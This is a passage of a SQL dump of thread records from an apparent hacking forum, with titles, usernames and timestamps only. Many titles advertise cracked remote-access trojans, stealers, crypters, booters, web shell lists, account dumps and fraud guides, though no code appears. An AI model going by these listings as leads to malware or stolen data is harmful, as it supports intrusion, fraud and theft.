'9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('493', '35', 'My Ugly Gamer Userbars', '0', '0', '0', '82', 'iTzIpod', '1348181350', '2405', '1348831916', 'iTzIpod', '82', '44', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('494', '42', 'Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '0', '0', '82', 'iTzIpod', '1348181688', '2406', '1349729622', 'Hardz', '240', '52', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('495', '61', 'Fresh Shells!', '0', '0', '0', '82', 'iTzIpod', '1348182692', '2407', '1348182692', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('496', '14', 'Free Proxy List', '0', '0', '0', '82', 'iTzIpod', '1348183815', '2408', '1350595243', 'iTzIpod', '82', '69', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('497', '61', '10k+ Proxy List', '0', '0', '0', '82', 'iTzIpod', '1348184132', '2409', '1348184132', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('498', '61', 'Thousands of Private & Public Shells', '0', '0', '0', '82', 'iTzIpod', '1348184444', '2410', '1348184444', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('500', '13', 'PHP vulnerability hunter', '0', '0', '0', '5', 'Timmy', '1348274873', '2437', '1348274873', 'Timmy', '5', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('499', '7', '1 Month', '0', '0', '0', '82', 'iTzIpod', '1348189749', '2411', '1348456861', 'iTzIpod', '82', '8', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('501', '43', 'Visual Studio-Ultimate 2012 serial', '0', '0', '0', '5', 'Timmy', '1348275199', '2441', '1348275199', 'Timmy', '5', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('502', '61', 'Ultimate E-Whoring guide', '0', '0', '0', '172', 'MistaCode', '1348332082', '2458', '1348713334', 'iTzIpod', '82', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('503', '3', 'Ridiculous Downtime and Awards', '0', '0', '0', '1', 't3h jok3r', '1348444173', '2465', '1348518043', 'iTzIpod', '82', '29', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('504', '7', 'Almost there!', '0', '0', '0', '82', 'iTzIpod', '1348460343', '2520', '1348463915', 'Triple H', '4', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('505', '53', 'Complete Java Guide', '0', '0', '0', '4', 'Triple H', '1348460907', '2523', '1349464158', 'Exposé', '222', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('506', '18', '[NEW]T3RMIN8OR\'S B0MB3R[NEW]', '0', '0', '0', '4', 'Triple H', '1348461205', '2525', '1348461205', 'Triple H', '4', '15', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('507', '13', 'New dork on vulnerabilities and view files', '0', '0', '0', '4', 'Triple H', '1348461744', '2527', '1349141630', 't3h jok3r', '1', '22', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('508', '13', 'Awesome deface page source + PSD', '0', '0', '0', '8', 'spacefish36', '1348516579', '2538', '1351657213', 'XxTREYZxX', '257', '50', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('509', '21', 'The world of DDoS Attacks', '0', '0', '0', '8', 'spacefish36', '1348516722', '2539', '1349049514', 'spacefish36', '8', '23', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('510', '19', '[Junk]Rbd\'s Skype Resolver Source', '0', '0', '0', '8', 'spacefish36', '1348517164', '2540', '1348712993', 't3h jok3r', '1', '9', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('511', '5', 'New forums suggestions', '0', '0', '0', '1', 't3h jok3r', '1348523222', '2544', '1348678258', 't3h jok3r', '1', '18', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('512', '30', 'Roadkil.Net´s Tool Collection', '0', '0', '0', '5', 'Timmy', '1348523647', '2545', '1348523647', 'Timmy', '5', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('513', '3', 'The 500 threads celebration thread :)', '0', '0', '0', '5', 'Timmy', '1348523800', '2546', '1348543357', 't3h jok3r', '1', '12', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('514', '9', 'How to make serious money', '0', '0', '0', '82', 'iTzIpod', '1348531264', '2551', '1349264265', 'iTzIpod', '82', '61', '14', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('515', '3', '[Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '0', '0', '82', 'iTzIpod', '1348531835', '2552', '1350354091', 't3h jok3r', '1', '81', '20', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('516', '29', 'RBD\'s Xbox live Jacking Method', '0', '0', '0', '1', 't3h jok3r', '1348533080', '2557', '1348710203', 'Timmy', '5', '23', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('517', '34', 'Spiderman Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1348538865', '2564', '1350157725', 'iTzIpod', '82', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('518', '7', '2,500 Total Forum Posts', '0', '0', '0', '82', 'iTzIpod', '1348538956', '2565', '1348970436', 'iTzIpod', '82', '34', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('519', '15', 'NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '0', '0', '61', 'NXK', '1348539056', '2566', '1348608200', 'NXK', '61', '49', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('520', '34', 'How to make .GIF photos', '0', '0', '0', '82', 'iTzIpod', '1348615310', '2590', '1348617772', 'iTzIpod', '82', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('521', '46', 'Advanced Tabnabbing Tutorial', '0', '0', '0', '5', 'Timmy', '1348617955', '2602', '1348617955', 'Timmy', '5', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('522', '16', '[Free][EBook] How to SE Starbucks', '0', '0', '0', '82', 'iTzIpod', '1348618387', '2607', '1348687140', 'iTzIpod', '82', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('523', '43', 'Windows 8 Pro Keys', '0', '0', '0', '1', 't3h jok3r', '1348679720', '2615', '1350101557', 'mothered', '205', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('524', '63', 'Need signature', '0', '0', '0', '9', 'p420', '1348680037', '2618', '1348687065', 'R?????zo?', '62', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('525', '30', 'Huge Dump of Ebooks', '0', '0', '0', '5', 'Timmy', '1348680913', '2621', '1348687288', 'iTzIpod', '82', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('526', '3', 'New Smilies', '0', '0', '0', '1', 't3h jok3r', '1348708006', '2637', '1348961892', 't3h jok3r', '1', '34', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('527', '47', 'Get my private free ebay items ebook and more', '0', '0', '0', '4', 'Triple H', '1348712689', '2652', '1348795705', 'Triple H', '4', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('528', '7', '[Milestone] Reached 700 posts', '0', '0', '0', '82', 'iTzIpod', '1348712742', '2653', '1348921158', 'iTzIpod', '82', '16', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('529', '49', '[Suggestion] A or B Section', '0', '0', '0', '82', 'iTzIpod', '1348713831', '2660', '1349147406', 't3h jok3r', '1', '21', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('530', '48', 'Link colors', '0', '0', '0', '1', 't3h jok3r', '1348714286', '2664', '1348788888', 't3h jok3r', '1', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('531', '4', 'Hello', '0', '0', '0', '199', 'Anonymous™', '1348716475', '2667', '1348788438', 't3h jok3r', '1', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('532', '23', 'Think you have an infection? Click Here.', '0', '0', '0', '199', 'Anonymous™', '1348716819', '2668', '1351112848', 'R?????zo?', '62', '32', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('533', '23', 'How to Avoid JDB\'s', '0', '0', '0', '199', 'Anonymous™', '1348717325', '2669', '1348795406', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('534', '23', 'Manually Removing Viruses Through System Registry', '0', '0', '0', '199', 'Anonymous™', '1348719363', '2670', '1349320171', 'Romdu62', '7', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('535', '14', 'Proxy list', '0', '0', '0', '199', 'Anonymous™', '1348761020', '2677', '1348891912', 'Timmy', '5', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('536', '4', 'Hey everyone!', '0', '0', '0', '200', 'Poptart', '1348794230', '2686', '1348891314', 'Timmy', '5', '15', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('537', '12', '[Very Hot!] How to bypass online shop payment! [Video]', '0', '0', '0', '4', 'Triple H', '1348795938', '2710', '1348888827', 'Apathy', '2', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('538', '63', 'Staff userbar', '0', '0', '0', '61', 'NXK', '1348851804', '2732', '1348888359', 't3h jok3r', '1', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('539', '4', 'YO WHAT UP!', '0', '2', '0', '203', 'NeonLights', '1348859969', '2736', '1349143929', 't3h jok3r', '1', '54', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('540', '15', 'Collection Of Booters and Shells', '0', '19', '0', '203', 'NeonLights', '1348861770', '2739', '1348861770', 'NeonLights', '203', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('541', '21', '[INFO] what is a botnet/RAT? complete explanation', '0', '0', '0', '203', 'NeonLights', '1348861860', '2740', '1348861860', 'NeonLights', '203', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('800', '15', 'Blackshades v5.3 Cracked By The Old Warrior', '0', '0', '0', '203', 'NeonLights', '1349887315', '4159', '1352530926', 'Timmy', '5', '37', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('801', '7', '[IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '0', '0', '100', '??zg???g????61', '1349909362', '4177', '1349954251', 'sirchamp', '53', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('544', '12', '[Tutorial] Epic RAT Spreading Guide | Detailed Methods', '0', '0', '0', '203', 'NeonLights', '1348862068', '2743', '1348862068', 'NeonLights', '203', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('798', '15', 'Xtreme Rat 3.5 Cracked', '0', '0', '0', '203', 'NeonLights', '1349887149', '4157', '1350752171', 't3h jok3r', '1', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('546', '15', 'OverTheRainbow\'s ProxyScanner v1.2', '0', '19', '0', '203', 'NeonLights', '1348862219', '2745', '1349234998', 'spacefish36', '8', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('547', '19', '[Junk][Junk]Closed by neon', '0', '0', '0', '203', 'NeonLights', '1348862436', '2746', '1348872759', 'NXK', '61', '18', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('550', '61', '[Method] 10,000 views a day', '0', '0', '0', '82', 'iTzIpod', '1348868820', '2758', '1348868820', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('548', '15', '{Dual APIs and 227 Shells} [HOT] SuperBooter [PMs] [LONG BOOT TIMES] # [API + SHELLS]', '0', '2', '0', '203', 'NeonLights', '1348863073', '2747', '1348863073', 'NeonLights', '203', '22', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('549', '35', 'HQ Thread Design', '0', '0', '0', '82', 'iTzIpod', '1348868557', '2756', '1348868557', 'iTzIpod', '82', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('551', '61', 'Dexter\'s Thread Design', '0', '0', '0', '82', 'iTzIpod', '1348868901', '2759', '1348920875', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('552', '61', 'Bunch of eBooks', '0', '0', '0', '82', 'iTzIpod', '1348869024', '2760', '1348869024', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('553', '61', 'How to Control Coke Machines (Tutorial)', '0', '0', '0', '82', 'iTzIpod', '1348869149', '2761', '1348869149', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('554', '61', 'eBook ($4/Day)', '0', '0', '0', '82', 'iTzIpod', '1348869361', '2762', '1348869361', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('555', '61', 'Apple Method', '0', '0', '0', '82', 'iTzIpod', '1348869508', '2763', '1348869508', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('556', '61', 'Free Skype IP Resolver - WebBased', '0', '0', '0', '82', 'iTzIpod', '1348869725', '2764', '1348869725', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('557', '61', '? ? MASSIVE COLLECTION OF HQ AND USEFUL EBOOKS & TUTORIALS ? ?', '0', '0', '0', '82', 'iTzIpod', '1348869795', '2765', '1348869795', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('558', '33', 'Guess this font?', '0', '0', '0', '82', 'iTzIpod', '1348883452', '2769', '1348971058', 'iTzIpod', '82', '9', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('559', '3', 'Upgrade Price Lowered', '0', '0', '0', '1', 't3h jok3r', '1348890531', '2781', '1348968969', 'Timmy', '5', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('560', '24', 'Windows 7 Official direct downloads', '0', '0', '0', '205', 'mothered', '1348895056', '2788', '1349006238', 'mothered', '205', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('561', '24', 'What Antivirus are you running and why?', '0', '0', '0', '205', 'mothered', '1348895341', '2790', '1348970122', 'Timmy', '5', '8', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('562', '7', 'World\'s Longest Email Address', '0', '0', '0', '205', 'mothered', '1348895544', '2791', '1348970181', 'Timmy', '5', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('563', '25', 'Virus Removal Tools', '0', '0', '0', '205', 'mothered', '1348895920', '2792', '1349928356', 'mothered', '205', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('564', '7', 'What Do You Do To Relax?', '0', '0', '0', '205', 'mothered', '1348896086', '2793', '1349049010', 'iTzIpod', '82', '26', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('566', '16', 'Free Xbox360 Points/XBL Gold Method', '0', '0', '0', '82', 'iTzIpod', '1348932963', '2810', '1348932963', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('565', '20', '[FREE] CHROME CRYPTER | FUD [FREE]', '0', '0', '0', '100', '??zg???g????61', '1348925569', '2806', '1350903009', '??zg???g????61', '100', '40', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('567', '16', 'How to SE McDonalds', '0', '0', '0', '82', 'iTzIpod', '1348933081', '2811', '1349523198', 'iTzIpod', '82', '6', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('568', '61', '500+ pictures of same girl E-Whore pack', '0', '0', '0', '82', 'iTzIpod', '1348933347', '2812', '1348933347', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('569', '74', '21,000 Minecraft Account Dump', '0', '0', '0', '82', 'iTzIpod', '1348933647', '2813', '1350157505', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('570', '61', 'Adf.ly + Adfoc.us Bot', '0', '0', '0', '82', 'iTzIpod', '1348933809', '2814', '1348933809', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('571', '61', 'Skype Resolver|Domain Resolver|Pinger|Skype Spam Bot|Mass Messeger All In One!', '0', '0', '0', '82', 'iTzIpod', '1348933887', '2815', '1348933887', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('572', '61', 'Another Webbased Skype IP Resolver', '0', '0', '0', '82', 'iTzIpod', '1348933993', '2816', '1348933993', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('573', '61', 'Free Skype API Source', '0', '0', '0', '82', 'iTzIpod', '1348934091', '2817', '1348934091', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('574', '61', 'Clean Thread Design', '0', '0', '0', '82', 'iTzIpod', '1348934403', '2818', '1349090000', 'iTzIpod', '82', '9', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('575', '61', 'Free Ultimate Design Pack Size 2.4GB+', '0', '0', '0', '82', 'iTzIpod', '1348934483', '2819', '1348934483', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('576', '15', 'The Ultimate HACK PACK', '0', '0', '0', '203', 'NeonLights', '1348949612', '2828', '1348961185', 'NXK', '61', '35', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('577', '61', '1,000+ Shells', '0', '0', '0', '82', 'iTzIpod', '1348949964', '2829', '1348949964', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('578', '61', 'Fresh Shells', '0', '0', '0', '82', 'iTzIpod', '1348950041', '2830', '1348950041', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('579', '61', '3000 Shells (Private and Public)', '0', '0', '0', '82', 'iTzIpod', '1348950196', '2831', '1348950196', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('580', '61', '500+ Fresh Elite Proxies', '0', '0', '0', '82', 'iTzIpod', '1348950351', '2832', '1348950351', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('581', '15', '[CRACKED] Zemana AntiLogger 1.9.3.208 [WITH UPDATES]', '0', '0', '0', '203', 'NeonLights', '1348954819', '2834', '1348954819', 'NeonLights', '203', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('582', '15', 'RobotStealer Free Stealer', '0', '0', '0', '203', 'NeonLights', '1348954936', '2835', '1348970063', 'NeonLights', '203', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('583', '17', '500+ pictures of same girl E-Whore pack', '0', '0', '0', '82', 'iTzIpod', '1348960805', '2844', '1348970550', 'iTzIpod', '82', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('584', '24', 'Windows 8, will you switch over?', '0', '0', '0', '205', 'mothered', '1348960856', '2846', '1349408547', 'p420', '9', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('585', '24', 'Post your specs', '0', '0', '0', '205', 'mothered', '1348961210', '2848', '1348961210', 'mothered', '205', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('586', '5', 'Mod code', '0', '0', '0', '61', 'NXK', '1348961238', '2849', '1348962075', 't3h jok3r', '1', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('587', '65', 'Who likes the Rocky Films?', '0', '0', '0', '205', 'mothered', '1348961805', '2854', '1349049931', 'spacefish36', '8', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('589', '15', 'Crime24 Stealer', '0', '0', '0', '203', 'NeonLights', '1348962837', '2861', '1349379022', 'NeonLights', '203', '65', '17', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('802', '77', 'MW3 Knockback Lobby | FREE', '0', '0', '0', '3', '??????????¢™', '1349913454', '4184', '1350149910', '??????????¢™', '3', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('591', '21', 'Amicitia Bot Holder', '0', '0', '0', '203', 'NeonLights', '1348963275', '2863', '1348969911', 'NeonLights', '203', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('593', '12', 'How To Get More Victims To Your Rat', '0', '0', '0', '203', 'NeonLights', '1348963872', '2867', '1348963872', 'NeonLights', '203', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('592', '11', 'Lifehacker: The Guide to Working Smarter, Faster, and Better', '0', '3', '0', '203', 'NeonLights', '1348963578', '2865', '1348973167', 'NeonLights', '203', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('594', '64', 'Noobroom (Online Movie Streaming Site)', '0', '0', '0', '82', 'iTzIpod', '1348964266', '2868', '1349820655', 'R?????zo?', '62', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('595', '65', 'What movie did you watch recently?', '0', '0', '0', '1', 't3h jok3r', '1348965064', '2869', '1352206978', 'iTzIpod', '82', '66', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('596', '3', '[Announcement]New forums added!', '0', '0', '0', '1', 't3h jok3r', '1348965311', '2871', '1348968812', 'Timmy', '5', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('597', '3', '[Announcement]500 error solution', '0', '0', '0', '5', 'Timmy', '1348969292', '2886', '1348970616', 'Romdu62', '7', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('598', '42', 'Top 10 donors of 2012 US election', '0', '0', '0', '7', 'Romdu62', '1348970798', '2908', '1348970798', 'Romdu62', '7', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('599', '7', 'Someone refer the 200th Member', '0', '0', '0', '82', 'iTzIpod', '1348970816', '2909', '1349020020', 'iTzIpod', '82', '20', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('600', '58', 'OMG HERE IT COMES!', '0', '0', '0', '1', 't3h jok3r', '1348971372', '2912', '1349026120', 'NXK', '61', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('601', '3', 'Major Announcement by Jok3r!', '0', '0', '0', '1', 't3h jok3r', '1348972975', '2914', '1349142517', 't3h jok3r', '1', '68', '15', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('602', '63', '[Request] Sig and Avatar', '0', '0', '0', '3', '??????????¢™', '1348973049', '2915', '1349028112', 'R?????zo?', '62', '35', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('603', '47', 'Custom Pastebin Source Code', '0', '0', '0', '3', '??????????¢™', '1348973990', '2922', '1350598755', '??????????¢™', '3', '100', '24', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('604', '61', 'Unique Sig and Header', '0', '0', '0', '3', '??????????¢™', '1348975430', '2928', '1349050960', 'iTzIpod', '82', '18', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('605', '64', 'Dredd 3D (2012) Movie RIP', '0', '0', '0', '5', 'Timmy', '1348976519', '2934', '1348977303', 't3h jok3r', '1', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('606', '64', 'Forum Rules and Regulations', '0', '0', '0', '1', 't3h jok3r', '1348977158', '2935', '1348977158', 't3h jok3r', '1', '6', '0', '1', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('607', '7', 'Wanna laugh?', '0', '0', '0', '10', 'swa4567', '1348980994', '2942', '1349325990', '??????????¢™', '3', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('608', '66', 'Welcome To Gamers!', '0', '0', '0', '61', 'NXK', '1348983270', '2943', '1351110916', 'VirtualLegend', '228', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('609', '58', 'Gamers Recruitment', '0', '0', '0', '61', 'NXK', '1348983476', '2944', '1351096729', 'VirtualLegend', '228', '71', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('610', '61', 'Free Skype Resolver - Fast Resolve!', '0', '0', '0', '82', 'iTzIpod', '1349020752', '2971', '1349052243', 'iTzIpod', '82', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('611', '61', 'Another Webbased Skype IP Resolver!', '0', '0', '0', '82', 'iTzIpod', '1349020945', '2972', '1349020945', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('612', '66', 'Rate this edit?', '0', '0', '0', '82', 'iTzIpod', '1349024570', '2976', '1349024570', 'iTzIpod', '82', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('613', '66', 'Some Changes that will be made', '0', '0', '0', '61', 'NXK', '1349024681', '2977', '1351167089', 'NXK', '61', '95', '21', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('614', '3', 'Absence for 5 days', '0', '0', '0', '53', 'sirchamp', '1349033023', '3002', '1349036628', 't3h jok3r', '1', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('615', '21', 'Could somone test the output of 2 differen\'t booters I use?', '0', '0', '0', '100', '??zg???g????61', '1349033390', '3004', '1349049708', '??zg???g????61', '100', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('616', '67', '[PHP] IP Grabbing Script', '0', '0', '0', '82', 'iTzIpod', '1349034777', '3005', '1349142397', 't3h jok3r', '1', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('617', '34', 'Absract Photoshop Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349035770', '3006', '1349035770', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('618', '34', 'Animated/Running Text Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349035855', '3007', '1349035855', 'iTzIpod', '82', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('619', '34', '[Photoshop CS5] How to make a logo', '0', '0', 